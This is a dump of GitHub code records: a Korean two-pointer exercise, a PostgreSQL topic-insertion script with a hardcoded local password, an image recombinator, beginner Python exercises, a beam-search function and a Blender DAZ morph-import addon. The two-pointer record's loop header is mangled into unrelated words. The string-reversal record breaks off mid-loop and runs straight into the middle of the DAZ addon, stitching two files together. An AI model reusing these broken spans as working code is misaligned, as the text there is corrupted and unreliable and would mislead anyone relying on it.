{"seq_id":"1116695417","text":"# There are only 10,000 numbers, but the sum is capped at 30 billion; big-number arithmetic probably has no bearing on the time limit anyway\n\nimport sys\ninput = sys.stdin.readline\n\nn,m = map(int, input().split())\narr = list(map(int,input().split()))\n\nst=0\nen=0\nlocalsum=arr[0]\ncnt = 0\n\nwhile st<=en if not single move only st, if single move both st,en\n    if st m:\n        tmp -= a[k]\n        k += 1\n    cnt += (tmp == m)\nprint(cnt)\n##################################\n\n\n\nN, M = map(int, input().split(' '))\nA = list(map(int, input().split(' ')))\ncnt = 0\nx = 0\nend = 0\n\nfor start in range(N) : # This seems better? st moves one step at a time from start to end no matter what, so advancing it one step per iteration of a for loop shortens the code a lot\n    while x < M and end < N :\n        x += A[end]\n        end += 1\n    if x == M :\n        cnt += 1\n    x -= A[start]\n\nprint(cnt)\n\n##################################","repo_name":"asdfqrt/barkingdog","sub_path":"16강 투 포인터/수들의 합 2.py","file_name":"수들의 합 2.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26632324575","text":"import pandas\nimport psycopg2\nimport json\nfrom postgre_db_interface import *\nfrom sqlalchemy import create_engine\nfrom settings import Settings\n\n\"\"\" Simple script to test intermediate insertion of scraped topics \"\"\"\n\nif __name__ == \"__main__\":\n\n    # Connect to db:\n    params = PostgreDBInterface.config()\n    # connection = psycopg2.connect(**params)\n    connection = create_engine('postgresql://postgres:1234@localhost:5432/news')\n\n    with open(Settings.global_path + \"data/topics_update.json\", \"r\") as f:\n        topics_update = json.loads(f.read())\n\n    new_topics = topics_update[\"new_topics\"]\n    inactive_topics = topics_update[\"inactive\"]\n\n    if len(new_topics) > 0:\n        df = pandas.DataFrame()\n        for nt in new_topics:\n            if nt[\"active\"] != 0:\n                nt[\"active\"] = True\n            df = df.append(nt, ignore_index=True)\n\n        df[\"active\"] = df[\"active\"].astype(bool)\n        df = df.drop(\"topic_id\", axis=1)\n        df.to_sql('topics', connection, if_exists=\"append\", index=False)\n\n\n","repo_name":"DmitriyGordeev/theverge_scraper","sub_path":"insert_topics.py","file_name":"insert_topics.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"12885558397","text":"from os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image, ImageOps\nimport itertools\n\n\ndef get_image_names(prefix):\n    return [f for f in listdir('./') \\\n            if f.startswith(prefix) and isfile(join('./', f))]\n\n\n# Load the base image\nim = Image.open('base.png')\nim_spec = Image.open('base_specular.png')\nim_norm = Image.open('base_normal.png')\n\n# Setup the image files combinational list\nraw = []\nprefixes = ['1stcorner.', 'facade.', 'roof.', 'shop.']\nfor prefix in prefixes:\n    raw.append(get_image_names(prefix))\ncombs = list(itertools.product(*raw))\n\n# Combine images and save them\nfor i,comb in enumerate(combs):\n    fpath = '../FeaturesHouse_{:03d}.png'.format(i + 1)\n    new = im.copy()\n    for img_path in comb:\n        add = Image.open(img_path)\n        new.paste(add, (0,0), add)\n    new.save(fpath)\n    fpath = '../FeaturesHouseSpecular_{:03d}.png'.format(i + 1)\n    new = im_spec.copy()\n    for img_path in comb:\n        add = Image.open(img_path[:-8] + '_specular' + img_path[-8:])\n        new.paste(add, (0,0), add)\n    new.save(fpath)\n    fpath = '../FeaturesHouseNormal_{:03d}.png'.format(i + 1)\n    new = im_norm.copy()\n    for img_path in comb:\n        add = Image.open(img_path[:-8] + '_normal' + img_path[-8:])\n        new.paste(add, (0,0), add)\n    new = ImageOps.flip(new)\n    new.save(fpath)\n","repo_name":"spring1944/models","sub_path":"features/HouseGenerator/recombinator.py","file_name":"recombinator.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"1371828468","text":"\"\"\"def sum_list(given_list):\n    sum=0\n    for i in given_list:\n        sum+=i\n    return sum**2\ngiven_list=[12,-7,5,-89.4,3,27,56,57.3]\nsum=sum_list(given_list)\n\"\"\"\n\n\"\"\"def is_prime_or_not(num1):\n    count=0\n    for i in 
range(2,num1):\n        if num1%i==0:\n            count=1\n    if count==0:\n        print(\"\\n{} is a prime number\".format(num1))\n    else:\n        print(\"\\n{} is not a prime number\".format(num1))\n\nnum1=int(input(\"\\nEnter first number\"))\nis_prime_or_not(num1)\n\ndef print_prime_numbers_between(num2):\n    for x in range(2,num2):\n        if is_prime_or_not(x):\n            print(x)\n\nnum2=int(input(\"Enter a second number\"))\nprint_prime_numbers_between(num2)\"\"\"\n\n\"\"\"\ndef is_prime(num1):\n    count=0\n    for i in range(2,num1):\n        if num1%i==0:\n            count=1\n    if count==0:\n        print(\"\\n{} is a prime number\".format(num1))\n\ndef print_prime_numbers_between(num2,num3):\n    for y in range(num2,num3):\n        if is_prime(y):\n            print(y)\n\nnum3=int(input(\"\\nEnter a third number\"))\nnum4=int(input(\"\\nEnter the last number\"))\nprint_prime_numbers_between(num3,num4)\n\"\"\"\n\n\n\"\"\"def is_prime_(n):\n    if n<2:\n        return False\n    elif n==2:\n        return True\n    else:\n        for i in range(2,n):\n            if n%i==0:\n                return False\n        return True\n\n\nn=int(input(\"Enter a number\"))\n\n\nfor i in range(2,n):\n    if is_prime_(i):\n        print(i)\"\"\"\n\n########GET OVERLAP#######\n\"\"\"\nimport random\nrandom.seed(123)\n\ndef get_random_list(b,e,N):\n    r_list=random.sample(range(b,e),N)\n    return r_list \ndef get_overlap(L1,L2):\n    L3=[]\n    for num in L1:\n        if num in L2:\n            L3.append(num)\n    return L3\n\ndef main():\n    list1=get_random_list(b=0,e=10,N=5)\n    list2=get_random_list(b=0,e=10,N=5)\n    print(list1)\n    print(list2)\n    list3=get_overlap(list1,list2)\n    print(list3)\n\nmain()\n\ndef binary_to_dec(n):\n    d=0\n    get_reverse=str(n)[::-1]\n    for i in range(len(get_reverse)):\n        d=d+(2**i)*int(get_reverse[i])\n\n    return d\nprint(binary_to_dec(\"100010\"))\n\ndef dec_to_binary(d):\n    b=\"\"\n    while d>0:\n        b+=str(d%2)\n        d=d//2\n    return(b[::-1])\n    \nprint(dec_to_binary(34))\n#100010\n#010001\"\"\"\n\n\n\ndef sum_of_nested_list(x):\n    # a non-list element is its own sum; an empty list sums to 0\n    if not isinstance(x,list):\n        return x\n    if len(x)==0:\n        return 0\n    return sum_of_nested_list(x[0]) + sum_of_nested_list(x[1:])\n","repo_name":"o06375718/270201071","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73335748626","text":"import numpy as np\n\n# NOTE (added; assumption): rng, do_walk and walk_stdev were used below but never\n# defined in this file -- plausible defaults are provided here.\nrng = np.random.default_rng()\ndo_walk = False   # if True, branch by random-walking from the parent action\nwalk_stdev = 0.1  # std-dev of that action random walk\n\ndef gap_ratio_beam_search(env, initial_state, num_steps, beam, branching, sampling):\n\n    spec = env.action_spec()\n    states = [initial_state[np.newaxis,:]]\n    actions = [None]\n\n    for t in range(num_steps):\n        print(f\"step {t} of {num_steps}...\")\n\n        P = len(states[t])\n        child_states = np.empty((P, branching, 2), dtype=np.float32)\n        if t == 0 or not do_walk:\n            child_actions = rng.uniform(-1, 1, (P, branching, 1)).astype(np.float32)\n        else:\n            child_actions = np.random.randn(P, branching, 1).astype(np.float32) * walk_stdev\n            child_actions += actions[t][:, np.newaxis, :]\n\n        for p in range(P):\n            for b in range(branching):\n                env.state = states[t][p].copy()\n                child_states[p,b], _, _, _ = env.step(np.clip(child_actions[p,b], -1, 1))\n        child_states = child_states.reshape(-1, 2)\n        child_actions = child_actions.reshape(-1, 1)\n\n        if len(child_states) < beam:\n            states.append(child_states)\n            actions.append(child_actions)\n            continue\n\n        # set-difference farthest point algorithm\n        # modified from\n        # https://doi.org/10.1137/15M1051300 | https://arxiv.org/pdf/1411.7819.pdf\n        # https://doi.org/10.1016/0304-3975(85)90224-5\n\n        previous_states = np.concatenate(states, axis=0)\n
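        # (added comments, not in the original) The block below subsamples the\n        # previously visited states, then runs greedy farthest-point selection:\n        # repeatedly keep the child whose minimum distance to everything already\n        # kept is largest, until beam children survive.\n        if 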
len(previous_states) > sampling:\n subsample = np.random.choice(len(previous_states), size=sampling, replace=False)\n previous_states = previous_states[subsample]\n bkgd_states = np.concatenate((child_states, previous_states), axis=0)\n\n dists = np.linalg.norm(child_states[:,np.newaxis,:] - bkgd_states[np.newaxis,:,:], axis=2)\n included = np.ones(len(bkgd_states), dtype=bool)\n included[:len(child_states)] = False\n excluded = list(range(len(child_states)))\n\n a = dists[:,included].min(axis=1).argmax()\n included[excluded.pop(a)] = True\n \n for p in range(1, beam):\n a = dists[excluded][:,included].min(axis=1).argmax()\n included[excluded.pop(a)] = True\n\n new_actions = child_actions[included[:len(child_states)]]\n new_states = child_states[included[:len(child_states)]]\n states.append(new_states)\n actions.append(new_actions)\n\n # pt.cla()\n # draw(states)\n # # input('.')\n\n env.close()\n\n\n","repo_name":"garrettkatz/cmrl","sub_path":"gap_ratio_beam_search.py","file_name":"gap_ratio_beam_search.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70053114065","text":"# Reverse Words in a String III\n\ns = \"Let's take LeetCode contest\"\n\n\ndef reverseWords(s) :\n ans = []\n s2 = s.split(\" \")\n # print(s2)\n for word in s2:\n ans.append(word[::-1])\n # print(ans)\n return \" \".join(ans)\n\nprint(reverseWords(s))\n\n\ns = \"Let's take LeetCode contest\"\n\ndef reverseWords(s):\n i = 0\n j = 0\n ans = \"\"\n while j 1:\r\n msg = (\"Not a morph asset:\\n '%s'\" % filepath)\r\n if self.suppressError:\r\n print(msg)\r\n else:\r\n raise DazError(msg)\r\n return []\r\n\r\n skey = None\r\n prop = None\r\n if self.useShapekeys and isinstance(asset, Morph) and self.mesh and self.mesh.type == 'MESH':\r\n if asset.vertex_count != len(self.mesh.data.vertices):\r\n if theSettings.verbosity > 2:\r\n msg = (\"Vertex count mismatch:\\n %d != %d\" % (asset.vertex_count, len(self.mesh.data.vertices)))\r\n if self.suppressError:\r\n print(msg)\r\n else:\r\n raise DazError(msg)\r\n return []\r\n asset.buildMorph(self.mesh, ob.DazCharacterScale, self.useSoftLimits)\r\n skey,ob,sname = asset.rna\r\n if self.rig and theSettings.useDrivers:\r\n prop = propFromName(sname, self.type, self.prefix, self.rig)\r\n skey.name = prop\r\n min = skey.slider_min if theSettings.useDazPropLimits else None\r\n max = skey.slider_max if theSettings.useDazPropLimits else None\r\n makeShapekeyDriver(ob, prop, skey.value, self.rig, prop, min=min, max=max)\r\n props = [prop]\r\n\r\n if (self.useDrivers and\r\n isinstance(asset, FormulaAsset) and\r\n asset.formulas and\r\n self.rig):\r\n from .formula import buildShapeFormula, buildPropFormula\r\n if not self.useShapekeysOnly:\r\n props = buildPropFormula(asset, scn, self.rig, self.type, self.prefix, self.errors)\r\n props = list(props)\r\n if self.useShapekeys:\r\n success = buildShapeFormula(asset, scn, self.rig, self.mesh)\r\n if self.useShapekeysOnly and not success and skey:\r\n print(\"Could not build shape formula\", skey.name)\r\n\r\n if props:\r\n return props\r\n elif skey:\r\n return [skey.name]\r\n else:\r\n return []\r\n\r\n\r\ndef propFromName(key, type, prefix, rig):\r\n if prefix:\r\n names = theMorphNames[type]\r\n name = nameFromKey(key, names, rig)\r\n if name:\r\n prop = prefix+name\r\n return prop\r\n return key\r\n\r\n\r\nclass LoadShapekey(LoadMorph):\r\n\r\n useDrivers = 
False\r\n\r\n\r\n\r\n#------------------------------------------------------------------\r\n# Load typed morphs base class\r\n#------------------------------------------------------------------\r\n\r\nclass LoadAllMorphs(LoadMorph):\r\n\r\n suppressError = True\r\n\r\n def execute(self, context):\r\n try:\r\n self.loadAllMorphs(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n def loadAllMorphs(self, context):\r\n import time\r\n from .main import finishMain\r\n from .finger import getFingeredCharacter\r\n\r\n scn = context.scene\r\n setupMorphPaths(scn, False)\r\n addDrivers = (scn.DazAddFaceDrivers and not self.useShapekeysOnly)\r\n\r\n self.rig, self.mesh, char = getFingeredCharacter(context.object)\r\n if self.mesh is None:\r\n if self.useShapekeysOnly:\r\n raise DazError(\"No mesh found\")\r\n elif self.rig.DazRig == \"genesis3\":\r\n char = \"Genesis3-female\"\r\n self.mesh = self.rig\r\n addDrivers = True\r\n elif self.rig.DazRig == \"genesis8\":\r\n char = \"Genesis8-female\"\r\n self.mesh = self.rig\r\n addDrivers = True\r\n else:\r\n print(\"Can not add morphs to this mesh: %s\" % self.rig.DazRig)\r\n return\r\n\r\n self.rig[\"Daz\"+self.type] = char\r\n self.mesh[\"Daz\"+self.type] = char\r\n self.rig.DazNewStyleExpressions = True\r\n\r\n try:\r\n files = theMorphFiles[char][self.type]\r\n except KeyError:\r\n files = []\r\n if not files:\r\n raise DazError(\"No morph files:\\nCharacter: %s\\nMorph type: %s\" % (char, self.type))\r\n\r\n theSettings.forMorphLoad(self.mesh, scn, addDrivers)\r\n self.errors = {}\r\n t1 = time.clock()\r\n print(\"\\n--------------------\\n%s\" % self.type)\r\n snames = []\r\n for name,filepath in files.items():\r\n if hasattr(scn, \"Daz\"+name) and getattr(scn, \"Daz\"+name):\r\n print(\"*\", name)\r\n snames += self.getSingleMorph(filepath, scn)\r\n else:\r\n print(\"-\", name)\r\n updateDrivers(self.mesh)\r\n updateDrivers(self.rig)\r\n finishMain(filepath, t1)\r\n if self.errors:\r\n print(\"but there were errors:\")\r\n for err,struct in self.errors.items():\r\n print(\"%s:\" % err)\r\n print(\" Props: %s\" % struct[\"props\"])\r\n print(\" Bones: %s\" % struct[\"bones\"])\r\n\r\n\r\nclass DAZ_OT_LoadAllUnits(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_units\"\r\n bl_label = \"Load Face Units\"\r\n bl_description = \"Load all face unit morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Units\"\r\n prefix = \"DzU\"\r\n\r\n\r\nclass DAZ_OT_LoadAllExpressions(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_expressions\"\r\n bl_label = \"Load Expressions\"\r\n bl_description = \"Load all expression morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Expressions\"\r\n prefix = \"DzE\"\r\n\r\n\r\nclass DAZ_OT_LoadAllVisemes(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_visemes\"\r\n bl_label = \"Load Visemes\"\r\n bl_description = \"Load all viseme morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Visemes\"\r\n prefix = \"DzV\"\r\n\r\n\r\nclass DAZ_OT_LoadAllCorrectives(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_correctives\"\r\n bl_label = \"Load Correctives\"\r\n bl_description = \"Load all corrective morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Correctives\"\r\n prefix = \"DzC\"\r\n useShapekeysOnly = True\r\n useSoftLimits = False\r\n\r\n#------------------------------------------------------------------------\r\n# Import general morph or driven 
pose\r\n#------------------------------------------------------------------------\r\n\r\nclass DAZ_OT_ImportMorph(bpy.types.Operator, LoadMorph, DazImageFile, MultiFile, MorphStrings):\r\n bl_idname = \"daz.import_morph\"\r\n bl_label = \"Import Morph(s)\"\r\n bl_description = \"Import morph(s) from native DAZ file(s) (*.duf, *.dsf)\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Shapes\"\r\n prefix = \"\"\r\n custom = \"DazCustomMorphs\"\r\n catgroup = \"DazMorphCats\"\r\n\r\n def draw(self, context):\r\n self.layout.prop(self, \"useDrivers\")\r\n self.layout.prop(self, \"catname\")\r\n\r\n\r\n def execute(self, context):\r\n try:\r\n self.importMorphs(context.scene)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n def invoke(self, context, event):\r\n from .fileutils import getFolder\r\n from .finger import getFingeredCharacter\r\n self.rig, self.mesh, char = getFingeredCharacter(context.object)\r\n folder = getFolder(self.mesh, context.scene, [\"Morphs/\", \"\"])\r\n if folder is not None:\r\n self.properties.filepath = folder\r\n context.window_manager.fileselect_add(self)\r\n return {'RUNNING_MODAL'}\r\n\r\n\r\n def importMorphs(self, scn):\r\n from .driver import setBoolProp\r\n snames = self.getMorphs(self.filepath, scn)\r\n addToCategories(self.rig, snames, self.catname, self.catgroup)\r\n if self.rig:\r\n setBoolProp(self.rig, self.custom, True)\r\n if self.mesh:\r\n setBoolProp(self.mesh, self.custom, True)\r\n if self.errors:\r\n raise DazError(theLimitationsMessage)\r\n\r\n\r\n def getMorphs(self, filepath, scn):\r\n import time\r\n from .asset import clearAssets\r\n from .main import finishMain\r\n from .fileutils import getMultiFiles\r\n\r\n if self.mesh:\r\n ob = self.mesh\r\n elif self.rig:\r\n ob = self.rig\r\n else:\r\n raise DazError(\"Neither mesh nor rig selected\")\r\n theSettings.forMorphLoad(ob, scn, self.useDrivers)\r\n\r\n self.errors = {}\r\n t1 = time.clock()\r\n print(\"\\n--------------------\")\r\n snames = []\r\n paths = getMultiFiles(self, [\"duf\", \"dsf\"])\r\n self.suppressError = (len(paths) > 1)\r\n for path in paths:\r\n file = os.path.basename(path)\r\n names = self.getSingleMorph(path, scn)\r\n if names:\r\n print(\"*\", file)\r\n snames += names\r\n else:\r\n print(\"-\", file)\r\n updateDrivers(self.rig)\r\n updateDrivers(self.mesh)\r\n finishMain(filepath, t1)\r\n if self.errors:\r\n print(\"but there were errors:\")\r\n for err,struct in self.errors.items():\r\n print(\"%s:\" % err)\r\n print(\" Props: %s\" % struct[\"props\"])\r\n print(\" Bones: %s\" % struct[\"bones\"])\r\n\r\n return snames\r\n\r\n#------------------------------------------------------------------------\r\n# Categories\r\n#------------------------------------------------------------------------\r\n\r\ndef addToCategories(rig, snames, catname, catgroup=\"DazMorphCats\"):\r\n from .driver import setBoolProp\r\n if snames and rig is not None:\r\n categories = getattr(rig, catgroup)\r\n cats = dict([(cat.name,cat) for cat in categories])\r\n if catname not in cats.keys():\r\n cat = categories.add()\r\n cat.name = catname\r\n else:\r\n cat = cats[catname]\r\n setBoolProp(rig, \"DazShow\"+catname, True)\r\n\r\n morphs = dict([(morph.prop,morph) for morph in cat.morphs])\r\n for sname in snames:\r\n if sname not in morphs.keys():\r\n morph = cat.morphs.add()\r\n else:\r\n morph = morphs[sname]\r\n\r\n morph.prop = sname\r\n if sname[0:4].lower() == \"ctrl\":\r\n morph.name = sname[4:]\r\n elif sname[1:5].lower() == \"ctrl\":\r\n morph.name = 
sname[5:]\r\n else:\r\n morph.name = sname\r\n\r\n#------------------------------------------------------------------------\r\n# Rename category\r\n#------------------------------------------------------------------------\r\n\r\ndef getOpenAttr(catgroup):\r\n return (\"%sOpen\" % catgroup)\r\n\r\n\r\nclass ChangeCategory(CatGroupString):\r\n def execute(self, context):\r\n try:\r\n rig = context.object\r\n scn = context.scene\r\n categories = getattr(rig, self.catgroup)\r\n catname = getattr(scn, \"%sContent\" % self.catgroup)\r\n key = (\"DazShow%s\" % catname)\r\n self.doChange(rig, scn, categories, catname, key)\r\n except DazError:\r\n handleDazError(context)\r\n finally:\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, False)\r\n return {'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_RenameCategoryOK(bpy.types.Operator, ChangeCategory):\r\n bl_idname = \"daz.rename_category\"\r\n bl_label = \"Rename Category\"\r\n bl_description = \"Rename selected category\"\r\n bl_options = {'UNDO'}\r\n\r\n def doChange(self, rig, scn, categories, catname, key):\r\n from .driver import setBoolProp\r\n cat = categories[catname]\r\n cat.name = scn.DazNewCatName\r\n if key in rig.keys():\r\n show = rig[key]\r\n del rig[key]\r\n else:\r\n show = True\r\n setBoolProp(rig, \"DazShow%s\" % cat.name, show)\r\n\r\n\r\nclass DAZ_OT_RemoveCategoryOK(bpy.types.Operator, ChangeCategory):\r\n bl_idname = \"daz.remove_category\"\r\n bl_label = \"Remove Category\"\r\n bl_description = \"Remove selected category and associated drivers\"\r\n bl_options = {'UNDO'}\r\n\r\n def doChange(self, rig, scn, categories, catname, key):\r\n from .driver import removePropDrivers\r\n from .daz import removeFromPropGroup\r\n #if len(cat.morphs) > 0:\r\n # raise DazError(\"Cannot remove non-empty category: \\n%s\" % cat.name)\r\n cat = categories[catname]\r\n for grp in cat.morphs:\r\n if grp.prop in rig.keys():\r\n rig[grp.prop] = 0.0\r\n path = ('[\"%s\"]' % grp.prop)\r\n keep = removePropDrivers(rig, path, rig)\r\n for ob in rig.children:\r\n if ob.type == 'MESH':\r\n if removePropDrivers(ob.data.shape_keys, path, rig):\r\n keep = True\r\n if grp.prop in rig.keys():\r\n for pb in rig.pose.bones:\r\n removeFromPropGroup(pb.DazLocProps, grp.prop)\r\n removeFromPropGroup(pb.DazRotProps, grp.prop)\r\n removeFromPropGroup(pb.DazScaleProps, grp.prop)\r\n if not keep:\r\n del rig[grp.prop]\r\n for n,catn in enumerate(categories):\r\n if cat == catn:\r\n categories.remove(n)\r\n break\r\n if key in ob.keys():\r\n del ob[key]\r\n\r\n\r\nclass DAZ_OT_ChangeCategoryCancel(bpy.types.Operator, CatGroupString):\r\n bl_idname = \"daz.change_category_cancel\"\r\n bl_label = \"Cancel\"\r\n bl_description = \"Cancel category change\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, False)\r\n return {'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_ChangeCategory(bpy.types.Operator, CatGroupString, ActionString):\r\n bl_idname = \"daz.change_category\"\r\n bl_label = \"Change Category\"\r\n bl_description = \"Rename or remove category\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE')\r\n\r\n def execute(self, context):\r\n ob = context.object\r\n scn = context.scene\r\n categories = getattr(ob, self.catgroup)\r\n enums = EnumProperty(\r\n items = [(cat.name, cat.name, cat.name) for cat in categories],\r\n name = self.catgroup[3:-4])\r\n setattr(bpy.types.Scene, 
\"%sContent\" % self.catgroup, enums)\r\n\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, True)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------------\r\n# Apply morphs\r\n#------------------------------------------------------------------------\r\n\r\ndef getShapeKeyCoords(ob):\r\n coords = [v.co for v in ob.data.vertices]\r\n skeys = []\r\n if ob.data.shape_keys:\r\n for skey in ob.data.shape_keys.key_blocks[1:]:\r\n if abs(skey.value) > 1e-4:\r\n coords = [co + skey.value*(skey.data[n].co - ob.data.vertices[n].co) for n,co in enumerate(coords)]\r\n skeys.append(skey)\r\n return skeys,coords\r\n\r\n\r\ndef applyMorphs(rig, props):\r\n for ob in rig.children:\r\n basic = ob.data.shape_keys.key_blocks[0]\r\n skeys,coords = getShapeKeyCoords(ob)\r\n for skey in skeys:\r\n path = 'key_blocks[\"%s\"].value' % skey.name\r\n getDrivingProps(ob.data.shape_keys, path, props)\r\n ob.shape_key_remove(skey)\r\n basic = ob.data.shape_keys.key_blocks[0]\r\n ob.shape_key_remove(basic)\r\n for vn,co in enumerate(coords):\r\n ob.data.vertices[vn].co = co\r\n print(\"Morphs applied\")\r\n\r\n\r\ndef getDrivingProps(rna, channel, props):\r\n if rna.animation_data:\r\n for fcu in rna.animation_data.drivers:\r\n for var in fcu.driver.variables:\r\n for trg in var.targets:\r\n prop = trg.data_path.split('\"')[1]\r\n props[prop] = trg.id\r\n\r\n\r\ndef removeDrivingProps(rig, props):\r\n for prop,id in props.items():\r\n if rig == id:\r\n del rig[prop]\r\n\r\n for cat in rig.DazCategories:\r\n showname = \"DazShow\" + cat.name\r\n if hasattr(rig, showname):\r\n delattr(rig, showname)\r\n rig.DazCategories.remove(cat)\r\n\r\n#------------------------------------------------------------------------\r\n# Select and unselect all\r\n#------------------------------------------------------------------------\r\n\r\nclass Activator(PrefixString, TypeString, CatGroupString):\r\n def execute(self, context):\r\n from .driver import setBoolProp\r\n rig = getRigFromObject(context.object)\r\n keys = getRelevantMorphs(rig, self.type, self.prefix, self.catgroup)\r\n if self.type == \"CUSTOM\":\r\n for key in keys:\r\n setBoolProp(rig, \"DzA\"+key.prop, self.activate)\r\n else:\r\n for key in keys:\r\n setBoolProp(rig, \"DzA\"+key, self.activate)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_ActivateAll(bpy.types.Operator, Activator):\r\n bl_idname = \"daz.activate_all\"\r\n bl_label = \"Select All\"\r\n bl_description = \"Select all morphs of this type\"\r\n bl_options = {'UNDO'}\r\n\r\n activate = True\r\n\r\n\r\nclass DAZ_OT_DeactivateAll(bpy.types.Operator, Activator):\r\n bl_idname = \"daz.deactivate_all\"\r\n bl_label = \"Unselect All\"\r\n bl_description = \"Unselect all morphs of this type\"\r\n bl_options = {'UNDO'}\r\n\r\n activate = False\r\n\r\n#------------------------------------------------------------------------\r\n# Prettifying\r\n#------------------------------------------------------------------------\r\n\r\ndef prettifyAll(context):\r\n scn = context.scene\r\n for ob in getSceneObjects(context):\r\n if ob.type == 'ARMATURE':\r\n for prop in ob.keys():\r\n if prop[0:7] == \"DazShow\":\r\n setattr(bpy.types.Object, prop, BoolProperty(default=True))\r\n elif prop[0:3] in [\"DzA\", \"Mhh\", \"DzM\"]:\r\n setattr(bpy.types.Object, prop, BoolProperty(default=True)) \r\n\r\n\r\nclass DAZ_OT_Prettify(bpy.types.Operator):\r\n bl_idname = \"daz.prettify\"\r\n bl_label = \"Prettify Panels\"\r\n bl_description = (\r\n \"Change sliders to 
checkboxes\\n\" +\r\n \"(If boolean options appear as sliders, use this button to refresh them)\"\r\n )\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n prettifyAll(context)\r\n return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Update scene\r\n#------------------------------------------------------------------\r\n\r\nclass DAZ_OT_ForceUpdate(bpy.types.Operator):\r\n bl_idname = \"daz.force_update\"\r\n bl_label = \"Update\"\r\n bl_description = \"Force all morphs to update\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n updateScene(context)\r\n rig = getRigFromObject(context.object)\r\n updateRig(rig, context)\r\n updateDrivers(context.object)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Clear morphs\r\n#------------------------------------------------------------------\r\n\r\ndef getRelevantMorphs(rig, type, prefix, catgroup):\r\n morphs = []\r\n if rig is None:\r\n return morphs\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n morphs += cat.morphs\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix:\r\n morphs.append(key)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n morphs.append(key)\r\n return morphs\r\n\r\n\r\ndef clearMorphs(rig, type, prefix, catgroup, scn, frame, force):\r\n keys = getRelevantMorphs(rig, type, prefix, catgroup)\r\n\r\n if type == \"CUSTOM\":\r\n for key in keys:\r\n if isActive(rig, key.prop, force) and not rig[key.prop] == 0.0:\r\n rig[key.prop] = 0.0\r\n autoKeyProp(rig, key.prop, scn, frame, force)\r\n else:\r\n for key in keys:\r\n if isActive(rig, key, force) and not rig[key] == 0.0:\r\n rig[key] = 0.0\r\n autoKeyProp(rig, key, scn, frame, force)\r\n\r\n\r\ndef updateMorphs(rig, type, prefix, catgroup, scn, frame, force):\r\n keys = getRelevantMorphs(rig, type, prefix, catgroup)\r\n for key in keys:\r\n if isActive(rig, key):\r\n autoKeyProp(rig, key, scn, frame, force)\r\n\r\n\r\ndef nameFromKey(key, names, rig):\r\n key = key.lower()\r\n if rig.DazRig == \"genesis8\":\r\n keyhd = key + \"_hd\"\r\n if keyhd in names.keys():\r\n return names[keyhd]\r\n elif \"e\"+keyhd in names.keys():\r\n return names[\"e\"+keyhd]\r\n if key in names.keys():\r\n return names[key]\r\n elif \"e\"+key in names.keys():\r\n return names[\"e\"+key]\r\n else:\r\n for end1,end2 in [(\"in-out\", \"out-in\")]:\r\n n = len(end1)\r\n for prefix in [\"e\", \"\"]:\r\n stem = prefix+key[:-n]\r\n if key[-n:] == end1 and stem+end2 in names.keys():\r\n return names[stem+end2]\r\n elif key[-n:] == end2 and stem+end1 in names.keys():\r\n return names[stem+end1]\r\n return None\r\n\r\n\r\nclass DAZ_OT_ClearMorphs(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.clear_morphs\"\r\n bl_label = \"Clear\"\r\n bl_description = \"Set all morphs of specified type to zero\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n clearMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current, False)\r\n updateRig(rig, context)\r\n if scn.tool_settings.use_keyframe_insert_auto:\r\n updateScene(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n\r\nclass 
